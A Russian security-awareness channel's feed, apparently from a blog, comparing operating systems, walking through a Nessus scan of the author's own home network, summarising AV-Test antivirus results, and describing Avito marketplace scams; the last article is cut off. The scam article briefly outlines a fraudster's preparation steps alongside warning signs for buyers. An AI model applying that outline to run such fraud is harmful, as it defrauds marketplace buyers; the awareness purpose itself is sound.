  <p id="znUd">Разберем некоторые особенности и аспекты, попытаемся понять, почему же порядок в мире ОС сложился именно таковым.</p>
  <h2 id="1hzC">Windows</h2>
  <p id="FNN0">Первое место, разумеется, занимает OS Windows. Почти 80% компьютеров в мире используют именно ее. Корпорация Microsoft прочно засела на звёздном пьедестале в силу ориентированности на любого пользователя. Хотите играть? Пожалуйста. Для офисных задач? Легко. Мультимедийный сектор? Проще простого. Построение серверов с использованием Windows? Windows Server к вашим услугам.</p>
  <p id="Zhke">Разработчики ПО почти никогда не пропускают Windows, когда выпускают новый продукт, поэтому, найти нужное ПО для своего ПК – простейшая задача.</p>
  <p id="S6jO">Пожалуй, есть только пару моментов, которые хотелось бы озвучить про данную ОС:</p>
  <ul id="XLVl">
    <li id="09TJ">Использование пиратского ПО, автоактиваторов Windows и чрезмерная тяга к настройкам системы, которые вы не до конца понимаете, может существенно <em>снизить производительность</em> ПК. Многие возразят про стоимость лицензии и будут правы, но в скором времени мы вам расскажем, где можно купить их <em>гораздо дешевле</em>. </li>
    <li id="TlSe">Второе – многие до сих пор не знают разницы между х86, х64, х32 системами.</li>
  </ul>
  <p id="EaYc">Разница, очевидно, в архитектуре процессоров. Процессоры архитектуры х86, еще ее называют 80386 - по первому процессору, в котором она была применена в 1985 году, имеют 32-разрядные регистры и аккумулятор. Процессоры семейства x64, точнее она называется х86-64, это процессоры с 64-разрядными регистрами. Они обратно совместимы с х86. <br />Соответственно, и операционные системы, разработанные для этих процессоров, обозначаются как х86 и х64. 64-разрядные системы обеспечивают использование больших объемов памяти, в некоторых случаях более быстрое исполнение команд, но их программы занимают больше места. Поэтому в компьютерах с 1-2 Гб оперативной памяти часто устанавливается 32-разрядная система.</p>
  <p id="eOfM">32-битная система, в свою очередь, более легкая, но она не сможет увидеть свыше 4 Гб оперативной памяти. Также она будет использовать не все преимущества железа в отличие от 64-битной. Причём разница будет существенной.</p>
  <h2 id="md8y">MacOS.</h2>
  <p id="JHUD">Система, которая является, пожалуй, образцовой в большинстве своих аспектов. Оптимизация, плавность, легкость в установке приложений и долгосрочная поддержка. И да, как правило, в ней нет обновлений, которые чинят одно, но ломают другое.</p>
  <p id="1VZL">Закрытость системы и ее проработка, своя архитектура, а ныне еще и собственные процессоры, которые при адаптированных приложениях под новую архитектуру показывают высокий прирост в производительности - все это является существенными плюсами данной ОС.</p>
  <p id="GmPM">Приведем список некоторых особенностей системы:</p>
  <ul id="bJGI">
    <li id="XQ0a">Внутренняя модель графического слоя Quartz хорошо взаимодействует с Portable<u> Document Format</u> (PDF), делая возможным вывод PDF на различные устройства.</li>
    <li id="Ar3M">Доступные для всех приложений меню, проверка орфографии, палитра специальных символов, выбор цвета, выбор шрифта и словарь.</li>
    <li id="Lbzj">Тени вокруг окон и изолированных текстовых элементов дают ощущение глубины и визуально отделяют содержимое одного окна от других.</li>
    <li id="63b0">OpenGL, используемый для вывода окон на экран, позволяет использовать аппаратное ускорение. Данная технология, появившаяся в версии 10.2 Jaguar, называется Quartz Extreme.</li>
    <li id="HfRh"><u>Dashboard</u>, появившийся в версии 10.4 Tiger, поддерживает небольшие приложения, называемые <u>виджетами</u> (widgets), которые могут быть вызваны и скрыты одним нажатием.</li>
    <li id="GRS1">Новая концепция переключателя задач — док.</li>
    <li id="xVCX">Использование <u>Unicode</u> во всей операционной системе.</li>
    <li id="Cwsy"><u>FileVault</u>, появившийся в версии 10.3 Panther, шифрует домашний каталог пользователя (начиная с OS X Lion возможно полное шифрование диска) по алгоритму <u>AES</u> с длиной ключа 128 бит.</li>
    <li id="Uj2M"><u>Spotlight</u> — технология для быстрого поиска данных, сообщений электронной почты, фотографий и другой информации, основываясь на свойствах файлов и их содержимом.</li>
    <li id="QYoR"><u>Automator</u> — приложение, позволяющее автоматизировать действия, совершаемые с разными приложениями.</li>
    <li id="BNUi">Связка ключей — система управления паролями, сертификатами и ключами пользователя. Позволяет приложениям хранить подобные данные в едином зашифрованном хранилище. Приложения с разрешения пользователя могут обращаться к данным других приложений, хранящимся в «Связке ключей».</li>
    <li id="zldX">Смарт-папки — позволяют создавать динамически обновляемые каталоги, основанные на определённых критериях, или исполняющие команды Automator.</li>
    <li id="HPl4">Подробное руководство по построению интерфейса Human Interface Guidelines, которому следует большинство разработчиков, делает их приложения интуитивно понятными.</li>
    <li id="2A56"><u>Xgrid</u> позволяет компьютерам Mac участвовать в <em>распределённых вычислениях.</em></li>
    <li id="wlIv">Встроенные в виртуальную файловую систему дисковые образы <u>.dmg</u> поддерживают шифрование, сжатие и опциональную возможность чтения/записи.</li>
    <li id="zS71">Встроенные сервисы синхронизации позволяют приложениям централизовано обращаться к расширяемой базе данных за различными данными пользователя, такими как: календарь, пароли или контакты. Операционная система управляет разрешением конфликтов и сохранностью данных.</li>
    <li id="Tn10">Mac App Store — магазин программного обеспечения для macOS. Появился в версии 10.6.6.</li>
  </ul>
  <p id="UxrE">А также некоторые графические особенности:</p>
  <ul id="kacC">
    <li id="aY67">Полноцветные масштабируемые значки.</li>
    <li id="BYq1">Сглаживание при отображении <u>виджетов</u>, текста, графики и оконных элементов.</li>
    <li id="D4WJ">Новые элементы интерфейса, такие как дроверы (drawers) и диалоговые модальные окна для документа.</li>
    <li id="5Z9l">«Плавающий» фокус (<em>Interweaving windows</em>) при переключении между окнами различных приложений.</li>
    <li id="Q4F5"><u>ColorSync</u>, использующийся для согласования цветопередачи, встроен в библиотеки рисования, для печати и мультимедиа.</li>
    <li id="PI9K"><u>Spaces</u> — поддержка нескольких рабочих столов.</li>
    <li id="kecX"><u>Exposé</u>, появившийся в версии 10.3 Panther, показывает миниатюры всех открытых окон, позволяя переключаться между ними, показывает все документы приложения как миниатюры или скрывает все окна для доступа к рабочему столу.</li>
  </ul>
  <p id="ivcs">Пожалуй, единственный момент, который остановит большинство – ц<em>ена устройств</em> с предустановленной системой MacOS.</p>
  <h2 id="fIIU">GNU/Linux</h2>
  <p id="HYDD">В одной статье рассмотреть различные вариации семейства Linux не получится. На это будет целый цикл статей.</p>
  <p id="QSwu">Сразу уясним, GNU — свободная Unix-подобная операционная система, разрабатываемая Проектом GNU.</p>
  <p id="s1NK">Данные операционные системы с ядром Linux являются открытыми. То есть любой энтузиаст имеет возможность создать собственный дистрибутив. В связи с этим, дистрибутивов, которые на данный момент существуют, достаточно много, однако именно поэтому развитие семейства GNU/Linux движется не так быстро, как проприетарные ОС Windows и Mac.</p>
  <p id="hDhB">Именно поэтому, большая часть людей, которые являются приверженцами Ричарда Столлмана, основателя движения свободного ПО), пользуются именно ОС основанными на Linux.</p>
  <p id="x63k">Огромное, достаточно сплоченное комьюнити, которое может грызть друг другу глотки, выясняя, какой дистрибутив лучше, но при этом оставаться верными своей идее. Комьюнити, которое занимается разработкой opensource ПО. Сообщество, которое само является двигателем прогресса GNU/Linux, ибо <a href="https://bash.im/quote/462649" target="_blank">Linux - это свобода</a>.</p>
  <p id="yWxz">Для тех, кто ни разу не пользовался ОС GNU/Linux рекомендуем попробовать, хотя бы на виртуальной машине. Данные ОС не являются чем-то сверхсложным, однако требуют от пользоваться учиться. Свобода никогда не дается просто так.<br /><br /><strong>Итак, что выбрать: многопрофильный Windows, удобный MacOS или создаваемый своими руками и руками сообщества Linux - решать вам, но стоит помнить, что ОС в любой момент можно поменять. Поэтому так или иначе советуем попробовать их все.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/VPGNRGiwIP3</guid><link>https://teletype.in/@ibmasters/VPGNRGiwIP3?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/VPGNRGiwIP3?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Проверка своих сетей на уязвимости</title><pubDate>Tue, 26 Oct 2021 19:25:14 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>В этой статье мы рассмотрим один из многих вариантов проверки устойчивости собственных сетей и систем.]]></description><content:encoded><![CDATA[
  <p id="gjPh">В этой статье мы рассмотрим один из многих вариантов проверки устойчивости собственных сетей и систем.</p>
  <p id="bT1W">Для начала, предостережение. Если вы являетесь владельцем бизнеса, и хотите проверить свои сети на наличие уязвимости, скажем в лучших традициях Минздрава – <strong>не занимайтесь самолечением</strong>. Если Вы боитесь потерять деньги или весь бизнес из-за киберугроз – <em>обратитесь к профессионалам</em>. Однако, если у вас имеется штат сотрудников IT – представленный в статье инструмент будет полезен и для них, хоть и весьма дорог в постоянном пользовании. Также не стоит забывать про аналоги.</p>
  <figure id="hdH4" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <p id="qD9t">Итак, начнем. Для примера мы разберем одного из известнейших представителей сканеров уязвимостей - Nessus.</p>
  <figure id="Uu0M" class="m_column">
    <img src="https://img4.teletype.in/files/f3/d2/f3d2ecf4-0dc4-48fd-9f82-161eea9d99e5.png" width="1401" />
  </figure>
  <p id="LVIe">Для тестирования есть бесплатная версия на <em>7 дней без карты</em>, жмем Free Trial.</p>
  <p id="4F6s">Выбираем Nessus (также вы можете ознакомиться и с другими продуктами) и проходим быструю регистрацию, после которой в течении 10-15 минут вам на почту придет инструкция по активации Nessus:</p>
  <figure id="Tk4L" class="m_column">
    <img src="https://img3.teletype.in/files/a1/08/a1082fde-1cb0-4d20-8999-949db555049e.png" width="548" />
  </figure>
  <p id="PGoN">После того, как придет сообщение на почту - переходим по ссылке и подтверждаем аккаунт, придумывая пароль. Попадаем на страницу, стрелочкой выделено место, где находится наш <em>ключ активации пробника</em>:</p>
  <figure id="vYgH" class="m_column">
    <img src="https://img3.teletype.in/files/67/9c/679c518e-171a-4f59-a5f0-5080075a433c.png" width="1900" />
  </figure>
  <p id="lscb">Далее находим кнопку скачать, и видим Nessus, нажимаем на название. Как видим, присутствует крайне широкий выбор ОС для загрузки. В нашем примере скачиваем версию для Windows 10 х64 msi пакет.</p>
  <figure id="TBIe" class="m_column">
    <img src="https://img4.teletype.in/files/b6/e2/b6e26ba3-23b2-455b-b6bd-e5fa4c9f75ee.png" width="1088" />
  </figure>
  <p id="niqM">Устанавливаем приложение. После установки откроется окно в браузере:</p>
  <figure id="r4oj" class="m_column">
    <img src="https://img1.teletype.in/files/c6/24/c624dc25-7d4c-444a-b830-bb07bd6f5fd7.png" width="1323" />
  </figure>
  <p id="FRI0">После нажатия на кнопку вас может предупредить про незащищенное соединение, главное – продолжить:</p>
  <figure id="rJxK" class="m_column">
    <img src="https://img3.teletype.in/files/6e/a7/6ea716a8-ef48-438c-99c3-e11300a57793.png" width="1917" />
  </figure>
  <p id="lpnf">Далее выбираем цель использования, ставим <em>Nessus Professional</em> и в следующем окне вводим свой код.</p>
  <p id="AKYh">Следующий шаг – создание пользователя, будьте внимательны, раскладка клавиатуры и регистр <em>влияют на введенные данные</em>, продолжим:</p>
  <figure id="O86s" class="m_column">
    <img src="https://img1.teletype.in/files/0f/7a/0f7a7a20-2cbc-4bc9-be57-64375193e9d6.png" width="1091" />
  </figure>
  <p id="bSAQ">После ввода данных нам необходимо подождать, загрузка может занимать 5-20 минут в зависимости от качества интернет соединения.</p>
  <figure id="gbQ6" class="m_column">
    <img src="https://img3.teletype.in/files/ef/77/ef776eb1-8fb5-4c75-8073-d27a4c98cea1.png" width="1089" />
  </figure>
  <p id="TQkF">По окончанию нас встретит такое окно:</p>
  <figure id="QqjS" class="m_column">
    <img src="https://img1.teletype.in/files/8c/ca/8ccaba6c-d0a0-437e-9d59-05e97228bdc4.png" width="1090" />
  </figure>
  <p id="OK6N">В нем предлагают указать диапазон сканирования сети для нахождения хостов. Примеры указания показаны в нижнем абзаце.</p>
  <p id="3HQD">Для примера будем проводить сканирование своей сети реальной сети, указываем диапазон 192.168.31.1/24, и сканер начинает работу.</p>
  <figure id="4XK8" class="m_column">
    <img src="https://img3.teletype.in/files/27/a2/27a22690-0faf-4f13-a8ca-3ad896f5cf7a.png" width="1018" />
  </figure>
  <p id="CeWW">Как видим сканер нашел 5 хостов: 1 маршрутизатор (31.1) и 4 подключенных устройства. Когда сканер хостов заканчивает работу, мы видим надпись:</p>
  <figure id="THW8" class="m_column">
    <img src="https://img1.teletype.in/files/4d/b1/4db1163f-5133-42f9-afa4-31a490d8a25f.png" width="702" />
  </figure>
  <p id="DcCq">Для примера был выбран личный ПК, и сам маршрутизатор, который, к слову, был выбран достаточно старый, с <em>не обновленной прошивкой</em>. Нажимаем Run scan:</p>
  <figure id="asdP" class="m_column">
    <img src="https://img4.teletype.in/files/74/91/74914759-84e2-4537-81dc-7452d818112f.png" width="655" />
  </figure>
  <p id="SB7I">Начнется сканирование:</p>
  <figure id="blMf" class="m_column">
    <img src="https://img2.teletype.in/files/d4/ea/d4eab691-4c18-4edb-8e20-333066204c6f.png" width="1716" />
  </figure>
  <p id="AqKv">Справа видим ход выполнения в процентах. Сканирование может занимать достаточно длительное время в зависимости от <em>мощности ПК и количества выбранных хостов.</em></p>
  <p id="eqBP">Справа можно увидеть круговой график, который показывает соотношение угроз:</p>
  <figure id="YNpf" class="m_original">
    <img src="https://img4.teletype.in/files/f6/23/f623fd74-f8e2-44fa-ac4e-999fd1f552aa.png" width="331" />
  </figure>
  <p id="LBcm">Сканирование заняло 25 минут, и мы получили такой результат:</p>
  <figure id="UZye" class="m_column">
    <img src="https://img4.teletype.in/files/f3/34/f3341bba-75ba-4987-a250-dba06e1df1ec.png" width="1502" />
  </figure>
  <p id="VlYw">Синим цветом обозначено количество источников получения информации о хосте. С какой-то стороны для большинства – безобидная вещь, однако, при подготовке к серьезным атакам одним из краеугольных моментов является разведка и нахождение <em>любой информации</em> об объекте. Об этом расскажем в одной из следующих статей.</p>
  <p id="hzya">Нажав на интересующий хост, к примеру, маршрутизатор, можно увидеть более полное описание найденных потенциальных брешей:</p>
  <figure id="ttRY" class="m_column">
    <img src="https://img1.teletype.in/files/cd/1f/cd1f59b2-ac36-4385-89b1-46998bba4d36.png" width="1484" />
  </figure>
  <p id="vZdE">Нажав на любую из них, мы можем увидеть нечто подобное:</p>
  <p id="U9ZQ">1 – описание, 2 – способ возможного решения, 3 – источник дополнительной информации. При необходимости пользуемся переводчиком.</p>
  <figure id="mPI8" class="m_column">
    <img src="https://img2.teletype.in/files/1f/bc/1fbcfa15-065f-4732-aea2-1e39914368d5.png" width="937" />
  </figure>
  <p id="1Ewk">Например, в данном случае, рекомендуется связаться с поставщиком DNS для решения данной проблемы.</p>
  <p id="xYNr">Если, к примеру, решение – настроить фильтрацию для скрытия данных, которые утекают, как здесь, то обращаемся к инструкциям по настройке DHCP сервера в маршрутизаторе:</p>
  <figure id="QoMf" class="m_column">
    <img src="https://img1.teletype.in/files/48/16/4816fecc-873d-4c8c-9622-e4e4326cac7f.png" width="939" />
  </figure>
  <p id="XHvf">Итак, пример разобран, самостоятельно действуйте по аналогии, не бойтесь пользоваться поисковиком в интернете.</p>
  <p id="HOgT">Резюмируя про Nessus, хочется сказать одно - это крайне мощный, хоть и дорогой инструмент, который имеет много настроек и возможностей. Может, в будущем сделаем отдельную статью с обзором его возможностей.</p>
  <p id="HBgL"><strong>Пользуйтесь проверенными инструментами и не пренебрегайте безопасностью, чтобы не стать жертвой злоумышленников. Подписывайтесь на канал и узнавайте больше о собственной безопасности.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/gdrT1NVRpRN</guid><link>https://teletype.in/@ibmasters/gdrT1NVRpRN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/gdrT1NVRpRN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Тестирование антивирусов, часть 1. AV-Test.</title><pubDate>Thu, 21 Oct 2021 19:58:33 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>Итак, в прошлой статье мы говорили о не самых популярных, однако весьма действенных антивирусов. И дабы не быть голословными, мы запускаем цикл статей, в которых будем проверять антивирусы на их эффективность. Интересно? Тогда начинаем.]]></description><content:encoded><![CDATA[
  <p id="docs-internal-guid-aacb0fe0-7fff-a76f-56e3-5d8a93c5fa1d">Итак, в прошлой статье мы говорили о не самых популярных, однако весьма действенных антивирусов. И дабы не быть голословными, мы запускаем цикл статей, в которых будем <em>проверять антивирусы</em> на их эффективность. Интересно? Тогда начинаем.</p>
  <figure id="K7LA" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <h2 id="7IXy">Как будем тестировать?</h2>
  <p id="4dcz">Безусловно, для обычного обывателя самым разумным выбором для защиты своих устройств будет программное обеспечение, прошедшее <em>независимое тестирование</em> какой-либо компании. Конечно, никто не даст 100% гарантии в неподкупности мнения, однако, для этого есть мы. Периодически нами будут проводиться <em>самостоятельные тестирования</em> антивирусов и специальных утилит очистки. Результатами этих тестов мы, естественно, будем делиться с вами. Но тем не менее, посмотрим на мнение официальных компаний насчет различных антивирусных решений.</p>
  <p id="k1cX">Итак, одной из самых известных лабораторий, занимающихся тестированием антивирусного ПО и специальных утилит, является <a href="https://www.av-test.org/en" target="_blank">AV-Test</a> .</p>
  <h2 id="NDo1">Что такое AV-Test и как проводятся тестирования?</h2>
  <p id="J6Bp">Сертификаты данной компании являются действительными в течении 12 месяцев с момента получения и считаются <em>достаточно престижными</em>.</p>
  <figure id="HmmO" class="m_column">
    <img src="https://lh4.googleusercontent.com/O96fQzaow1x52UK5VYXxriVekeMzW22tjjivWeYzcqcLgog_brPZ7knS2qKmIUIrEeT-92_BIj-cJ5GWPYwwm4-xUcIUaar7v5YCg0L4k08y_2iTK-zuxY-RUcrawfCsi8qMcCrb=s1600" width="647" />
  </figure>
  <p id="qee1">На главной странице сайта мы можем увидеть большой выбор разных тестов безопасности. Здесь вы можете найти продукт, который соответствует устройству, на котором вы <em>будете его использовать</em>.</p>
  <figure id="TOM9" class="m_column">
    <img src="https://lh4.googleusercontent.com/UKYHU9GCw7HH3GnYX0oGVNwVmWrl8gsXs-MEBkSKuMwjdEnD3DznOTcdrT7lYnQL6GpOIbrhfsZ-9VY0iiFJKfivMc6BeH3YLiRsHQ_vvdDRZKBlDtNkSY4oJAtZtUE5W8Fly41e=s1600" width="1006" />
  </figure>
  <p id="DM24">На момент написания статьи последнее тестирование было совершено в августе 2021 года для Windows 10.</p>
  <p id="vm7v">Коротко о том, как проводилось тестирование:</p>
  <p id="2995"><strong>11 продуктов с 27 или 54 индивидуальными тестами</strong></p>
  <p id="wjBT">В комплексном тестировании лаборатория проверила 7 антивирусных продуктов и 4 специализированных инструмента. Каждый продукт должен был обнаружить 27 или 54 атаки, удалить угрозы и восстановить поврежденную систему. Всего проходило три этапа тестирования:</p>
  <ul id="ieaV">
    <li id="pUUp"><em><u>Этап 1: тестируемый продукт устанавливается в зараженную систему Windows</u></em>. <br />Это классический сценарий восстановления. Вредоносное ПО и все его компоненты должны быть распознаны и удалены, а система восстановлена. На данном этапе выполнялось 27 индивидуальных тестов.</li>
    <li id="2gSo"><em><u>Этап 2: защита отключается на время заражения.</u></em> <br />В данном испытании имитируется ситуация, когда вредоносная программа запускается после того, как программа защиты не смогла ее идентифицировать. После этого антивирусная защита повторно активируется и оценивается его дальнейшая реакция. На данной стадии каждый продукт проходил еще 27 индивидуальных испытаний.</li>
    <li id="k3Al"><em><u>Этап 3: установка специального инструмента очистки.</u></em><br />Еще один классический сценарий: после успешной атаки на ПК используется специальная программа очистки, обычно в виде загрузочного диска или загрузочного USB-накопителя.</li>
  </ul>
  <p id="7auu">Во всех испытаниях часть манипуляций приходится выполнять вручную, поскольку решения защиты часто отображают информационные окна, требующие подтверждения. Более того, каждая система <em>проверяется</em> после успешной атаки и восстановления, а после сбрасывается для последующего индивидуального теста.</p>
  <p id="VEwl">Критерии оценки были следующими:</p>
  <ul id="TQ5v">
    <li id="kSxd"><em><u>Защита (Protection).</u></em><br />Один из самых важных критериев оценки, которые использует независимая лаборатория AV-TEST при тестировании антивирусов – Защита (Protection). Методика включает тесты, которые задействуют все защитные компоненты и возможности антивируса.<br />В данном тестировании использовалось образцы новейших угроз &quot;нулевого дня&quot; – вредоносные атаки, включая веб- и email-угрозы, а также образцы широко распространенных вредоносных программ, обнаруженных в течение 4 недель до момента испытаний.</li>
    <li id="aJbY"><em><u>Производительность (Performance).<br /></u></em>В тестировании AV-TEST с помощью критерия Производительность (Performance) оценивают влияние антивирусных решений на системное быстродействие при выполнении основных повседневных задач на компьютере.</li>
    <li id="DmtH"><em><u>Юзабилити (Usability)</u></em><br />Лаборатория AV-TEST использует критерий Юзабилити (Usability) для оценки удобства использования антивирусного решения, что представляет собой тестирование на ложные срабатывания.</li>
  </ul>
  <h2 id="DD3x">Список проверенных продуктов</h2>
  <h4 id="NFhB">7 антивирусных решений:</h4>
  <ul id="SAYg">
    <li id="ECJd"><em><u>Avast Free Antivirus</u></em></li>
    <li id="NpvB"><em><u>AVG Internet Security</u></em></li>
    <li id="Rih1"><em><u>Avira Antivirus Pro</u></em></li>
    <li id="5yqr"><em><u>Bitdefender Internet Security</u></em></li>
    <li id="oV3B"><em><u>Kaspersky Internet Security</u></em></li>
    <li id="4qm4"><em><u>Microsoft Defender</u></em></li>
    <li id="NGv6"><em><u>Norton Security</u></em></li>
  </ul>
  <h4 id="9T0H">4 специализированных инструмента:</h4>
  <ul id="srpM">
    <li id="d9JY"><u><em>G Data BootMedium</em></u></li>
    <li id="xEZ4"><u><em>Heise Desinfec&#x27;t 2019</em></u></li>
    <li id="aZlF"><u><em>Kaspersky Virus Removal Tool</em></u></li>
    <li id="bves"><u><em>Vipre Security Virus Removal Tool</em></u></li>
  </ul>
  <p id="VtLQ">Все данные инструменты очистки, за исключением Heise Desinfec&#x27;t 2019, доступны в Интернете для <em>бесплатной загрузки</em>, обычно в виде ISO-файла и уже готового загрузочного накопителя.</p>
  <h2 id="QhDP">Результаты тестов</h2>
  <figure id="KVEJ" class="m_column">
    <img src="https://lh3.googleusercontent.com/xZaeftNyRumXh1ZICUC2UTk4mTcBl8m8kd1ttsZquwUGbDNdhTV-UcGQ5rRFAwDRx2eEbwwCXrnc2VbXayxHu5r1KSSj11eu3tMstrvOkDRzm2mSgkarJ85aCCEx0KLwfVPxuNoD=s1600" width="1600" />
  </figure>
  <figure id="K28N" class="m_column">
    <img src="https://lh6.googleusercontent.com/TNmuZkHpsgNitZ0dCkCFMw0c8XYiWsgVRxx6AuPN9p6s7poSxIylM7mp9scg7XCxo7TPtcaBlSeKieRNzeeNCgXh9Aq56cmVRWcQd5-k2scbgf0rT26pCPIa6euVrjxDaiz1o3VF=s1600" width="1600" />
  </figure>
  <p id="S65B">Процедура проведения индивидуального теста может показаться простой, но, к сожалению, это не всегда так. В таблице приведены результаты для 7 антивирусов и 4 инструментов очистки. Отдельные значения выделены цветом для большей наглядности.</p>
  <ul id="rGzJ">
    <li id="yrNn"><em><u>Темно-красный цвет:</u></em> количество случаев, когда вредоносная программа не была обнаружена.</li>
    <li id="5wxQ"><em><u>Красный цвет:</u></em> количество случаев, когда активные и опасные компоненты вредоносной программы не были удалены.</li>
    <li id="ZsfF"><em><u>Желтый цвет:</u></em> количество случаев, когда безвредные остатки были проигнорированы.</li>
    <li id="Hg0F"><em><u>Зеленый цвет:</u></em> количество полностью очищенных систем.</li>
  </ul>
  <p id="cznH">В последних столбцах записано значение эффективности очистки в процентах. За каждую <em>полностью очищенную</em> систему лаборатория присуждала <em>3 балла</em>. Если в системе сохранились лишь <em>безобидные файлы</em> вредоносной программы, то тестируемый продукт получал <em>2 балла</em>. Если в системе после очистки оставались <em>опасные объекты</em>, то участник тестирования получал <em>1 балл</em>. Наконец, если вредоносная программа <em>не была обнаружена</em>, то в данном тестовом случае <em>баллы не начислялись</em>. Эффективность очистки вычислялась как процентное соотношение полученных баллов от максимально возможного количества баллов. В случае с инструментами очистки проводилось 27 индивидуальных испытаний, т.е. максимально можно было заработать 81 балл (до трех баллов в каждом сценарии). Именно это значение принималось за 100%.</p>
  <p id="1kXe">Просим заметить, что в данном тесте, который был приведен в пример, лаборатория не проверяла атаки с помощью <em>вирусов-шифровальщиков</em>, которые имеют свои нюансы работы.</p>
  <p id="32Dh"><strong>Итак, мы ознакомились с тестированием антивирусов, проведенным компанией AV-Test, но самое интересное - наше самостоятельное тестирование антивирусов против самого разнообразного вредоносного ПО - еще впереди. Подписывайтесь на канал, чтобы не пропустить его.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ibmasters/p3DhfKzfw-q</guid><link>https://teletype.in/@ibmasters/p3DhfKzfw-q?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters</link><comments>https://teletype.in/@ibmasters/p3DhfKzfw-q?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ibmasters#comments</comments><dc:creator>ibmasters</dc:creator><title>Мошенничество в интернете</title><pubDate>Fri, 15 Oct 2021 13:58:39 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/b6/2b/b62b6f55-b423-476b-ad91-f6e04a3a72d7.jpeg"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg"></img>В прошлой статье мы рассмотрели масштабы мошеннических проектов, которые действуют на просторах интернета, а также провели небольшую демонстрацию одного из ботов, используемых мошенниками.]]></description><content:encoded><![CDATA[
  <p id="KTPS">В прошлой статье мы рассмотрели масштабы мошеннических проектов, которые действуют на просторах интернета, а также провели небольшую демонстрацию <em>одного из ботов</em>, используемых мошенниками.</p>
  <p id="Ia1P">Хоть мы и будем рассматривать в этой статье все на примере площадки Авито, подобные методы обмана работают и на <em>любой другой платформе</em>, при наличии технической составляющей.</p>
  <blockquote id="rth8">Дисклеймер. Все материалы представлены исключительно в ознакомительных целях, авторы ни в коем случае не призывают заниматься мошенничеством и всячески его порицают.</blockquote>
  <figure id="ziOv" class="m_column">
    <img src="https://img1.teletype.in/files/82/14/82141dc5-e226-4fd1-a1cb-729484b07521.jpeg" width="1200" />
  </figure>
  <h2 id="Elx0">Примеры мошеннических схем</h2>
  <p id="7LZV">Начнем. В первую очередь, хочется сказать, что скамеры (мошенники) имеют в своем распоряжении целые пособия с полностью расписанными по пунктам методами получения ваших денег, а также пунктами по безопасности, работе с ПК, работе со смартфона и т.д. Все это существенно <em>понижает порог входа</em> для новичков, тем самым увеличивая масштабы скам-проектов.</p>
  <p id="FALa">Для примера мы разберем схему Авито 1.0 и Авито 2.0. Да, почти каждая площадка имеет <em>несколько версий скама</em>.</p>
  <h3 id="zPjr">Авито 1.0</h3>
  <p id="F3N2">Работа по данной версии включает обычное мошенничество по предоплате напрямую на карты/электронные кошельки дропов мошенника или же оплату по специальной ссылке, пример которой мы показывали в прошлой <a href="https://teletype.in/@ibmasters/JOhzRXq0b6B" target="_blank">статье</a>, в результате которой вы потеряете и данные своей карты.</p>
  <p id="VcyC">Схему мошенника можно описать в несколько этапов:</p>
  <ol id="JyMW">
    <li id="r9A7"><u>Создание собственной безопасности</u> - соблюдение анонимности (хотя некоторые умудряются даже VPN не включить);</li>
    <li id="O0Hi"><u>Подготовка аккаунта</u> - его покупка или же регистрация на купленные номера;</li>
    <li id="xa7y"><u>Подбор товара</u> для «продажи»;</li>
    <li id="8MTL"><u>Подготовка знаний по товару</u> - здесь ситуативно, но умные готовятся, чтоб хотя бы мочь ответить на базовые вопросы. К примеру, продавая автомобильные диски не знать их разновидности – глупо;</li>
    <li id="jBnb"><u>Непосредственная работа</u> - публикация объявлений и общение с покупателем.</li>
  </ol>
  <p id="z3Eq">В целом схема довольно проста, так что говорить о ней много не будем, однако расскажем, какие маркеры указывают на данный вид скама:</p>
  <ol id="kXws">
    <li id="w1A0"><u>Цена</u>. Характерный показатель, на который мало кто обращает внимание. Вам не кажется подозрительным продажа нового iPhone 11 за 30 тысяч рублей? Думаем, ответ очевиден, но есть те, кто на это ведется.</li>
    <li id="7ZXA"><u>Невозможность личной встречи</u>. Если продавец начинает уверять, что резко он не находится в городе – в 99% случаев это мошенник. Да, шанс того, что это нормальный продавец, есть, но лучше не рисковать;</li>
    <li id="37Fw"><u>Настойчивые просьбы перейти в мессенджер</u>. Ни в коем случае, как бы вам не было удобно. Если же это не представляется возможным, не пользуйтесь ссылками для оплаты, отправленными вам в мессенджерах.</li>
  </ol>
  <p id="Z0Bv">Также пара советов по безопасной покупки:</p>
  <ol id="bi9H">
    <li id="4qt1">Не верьте накладным (да, они могут быть активными при проверке трек номера), скинутым паспортам и голосовым сообщениям. Этого добра хватает в интернете с головой, при чем <em>крайне дешево</em>;</li>
    <li id="5J9x">Отзывы на аккаунте продавца – не всегда <em>показатель добросовестности</em>. Если вы читали наши прошлые <a href="https://teletype.in/@ibmasters/PytgCmAOFhN" target="_blank">статьи</a>, аккаунты продавцов получаются точно таким же методом, то есть фишингом.</li>
  </ol>
  <h3 id="Y1ar">Авито 2.0.</h3>
  <p id="uaqc">Основная фишка - мошенничество не на предоплате, а на <em>получении денег продавцом</em>.</p>
